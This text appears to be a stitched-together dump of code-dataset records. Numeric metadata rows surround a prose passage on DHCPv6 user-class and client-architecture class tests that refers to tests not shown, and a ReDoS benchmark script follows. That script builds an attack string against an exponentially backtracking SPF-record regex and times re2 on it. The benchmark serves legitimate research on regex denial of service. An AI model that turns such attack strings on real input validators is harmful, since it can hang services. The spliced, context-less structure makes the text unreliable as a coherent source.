| 41.228346 | 95 | 0.710275 | 767 | 5,236 | 4.478488 | 0.130378 | 0.092576 | 0.097817 | 0.110626 | 0.965939 | 0.959825 | 0.959825 | 0.950801 | 0.940029 | 0.940029 | 0 | 0.038031 | 0.146295 | 5,236 | 126 | 96 | 41.555556 | 0.730425 | 0.045073 | 0 | 0.881188 | 0 | 0 | 0.21274 | 0.011619 | 0 | 0 | 0.002404 | 0 | 0 | 1 | 0.029703 | true | 0.039604 | 0.039604 | 0 | 0.069307 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
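The class "test" expressions exercised above lean on two details of the DHCPv6 wire format: user-class data in option 15 carries a 2-octet length before the opaque value (which is why the expression reads substring(option[15].hex,2,4)), and the client-arch-type option 61 carries a 16-bit architecture identifier (hence the literal 0x0007). A short sketch of what those expressions end up comparing — the struct-based encoding below is only an illustration of the layout, not code from the forge framework:

import struct

user_class = struct.pack('!H', 4) + b'iPXE'   # user-class-data: 2-byte length, then 'iPXE'
arch_type = struct.pack('!H', 7)              # client-arch-type: 16-bit architecture id 7

# substring(option[15].hex, 2, 4) skips the length prefix and reads the class name.
assert user_class[2:6] == b'iPXE'
# option[61].hex == 0x0007 compares the raw two-byte value.
assert arch_type == bytes.fromhex('0007')

print(user_class.hex(), arch_type.hex())      # 000469505845 0007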
049bb07740ef931bfadbdeed93e59ba49575bc92 | 4,195 | py | Python | regexlib/python_re2_test_file/regexlib_7920.py | yetingli/ReDoS-Benchmarks | f5b5094d835649e957bf3fec6b8bd4f6efdb35fc | [
"MIT"
] | 1 | 2022-01-24T14:43:23.000Z | 2022-01-24T14:43:23.000Z | regexlib/python_re2_test_file/regexlib_7920.py | yetingli/ReDoS-Benchmarks | f5b5094d835649e957bf3fec6b8bd4f6efdb35fc | [
"MIT"
] | null | null | null | regexlib/python_re2_test_file/regexlib_7920.py | yetingli/ReDoS-Benchmarks | f5b5094d835649e957bf3fec6b8bd4f6efdb35fc | [
"MIT"
] | null | null | null | # 7920
# ^v=spf1[ \t]+[+?~-]?(?:(?:all)|(?:ip4(?:[:][0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})?(?:/[0-9]{1,2})?)|(?:ip6(?:[:]([0-9A-Fa-f]{1,4}:){7}[0-9A-Fa-f]{1,4})?(?:/[0-9]{1,2})?)|(?:a(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+)?(?:/[0-9]{1,2})?)|(?:mx(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+)?(?:/[0-9]{1,2})?)|(?:ptr(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+))|(?:exists(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+))|(?:include(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+))|(?:redirect(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+))|(?:exp(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+))|)(?:(?:[ \t]+[+?~-]?(?:(?:all)|(?:ip4(?:[:][0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})?(?:/[0-9]{1,2})?)|(?:ip6(?:[:]([0-9A-Fa-f]{1,4}:){7}[0-9A-Fa-f]{1,4})?(?:/[0-9]{1,2})?)|(?:a(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+)?(?:/[0-9]{1,2})?)|(?:mx(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+)?(?:/[0-9]{1,2})?)|(?:ptr(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+))|(?:exists(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+))|(?:include(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+))|(?:redirect(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+))|(?:exp(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+))|))*)?$
# EXPONENT
# nums:5
# EXPONENT AttackString:"v=spf1 "+" "*32+"! _1_NQ"
import re2 as re
from time import perf_counter
regex = """^v=spf1[ \t]+[+?~-]?(?:(?:all)|(?:ip4(?:[:][0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})?(?:/[0-9]{1,2})?)|(?:ip6(?:[:]([0-9A-Fa-f]{1,4}:){7}[0-9A-Fa-f]{1,4})?(?:/[0-9]{1,2})?)|(?:a(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+)?(?:/[0-9]{1,2})?)|(?:mx(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+)?(?:/[0-9]{1,2})?)|(?:ptr(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+))|(?:exists(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+))|(?:include(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+))|(?:redirect(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+))|(?:exp(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+))|)(?:(?:[ \t]+[+?~-]?(?:(?:all)|(?:ip4(?:[:][0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})?(?:/[0-9]{1,2})?)|(?:ip6(?:[:]([0-9A-Fa-f]{1,4}:){7}[0-9A-Fa-f]{1,4})?(?:/[0-9]{1,2})?)|(?:a(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+)?(?:/[0-9]{1,2})?)|(?:mx(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+)?(?:/[0-9]{1,2})?)|(?:ptr(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+))|(?:exists(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+))|(?:include(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+))|(?:redirect(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+))|(?:exp(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+))|))*)?$"""
REGEX = re.compile(regex)
for i in range(0, 150000):
    ATTACK = "v=spf1 " + " " * i * 1 + "! _1_NQ"
    LEN = len(ATTACK)
    BEGIN = perf_counter()
    m = REGEX.search(ATTACK)
    # m = REGEX.match(ATTACK)
    DURATION = perf_counter() - BEGIN
    print(f"{i *1}: took {DURATION} seconds!") | 220.789474 | 1,892 | 0.390465 | 963 | 4,195 | 1.693666 | 0.05919 | 0.309013 | 0.515021 | 0.618026 | 0.842428 | 0.842428 | 0.842428 | 0.842428 | 0.842428 | 0.842428 | 0 | 0.129765 | 0.024553 | 4,195 | 19 | 1,893 | 220.789474 | 0.268817 | 0.470083 | 0 | 0 | 0 | 0.090909 | 0.86829 | 0.84258 | 0.090909 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.181818 | 0 | 0.181818 | 0.090909 | 0 | 0 | 1 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 15
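The header comments mark this SPF pattern as exponentially backtracking ("EXPONENT"), which is why the benchmark drives it through re2, a linear-time matching engine, while growing the attack string. For contrast, here is a tiny self-contained illustration of the same failure mode in Python's backtracking re module, using a classic pathological pattern rather than the SPF regex above (which would stall a backtracking engine even at small sizes); the pattern and sizes are chosen only for demonstration:

import re
from time import perf_counter

evil = re.compile(r'^(a+)+$')                    # nested quantifiers: catastrophic backtracking
for n in range(18, 24):
    s = 'a' * n + '!'                            # almost-matching input forces full exploration
    t0 = perf_counter()
    evil.match(s)
    print(f"n={n}: {perf_counter() - t0:.3f}s")  # time roughly doubles with each extra 'a'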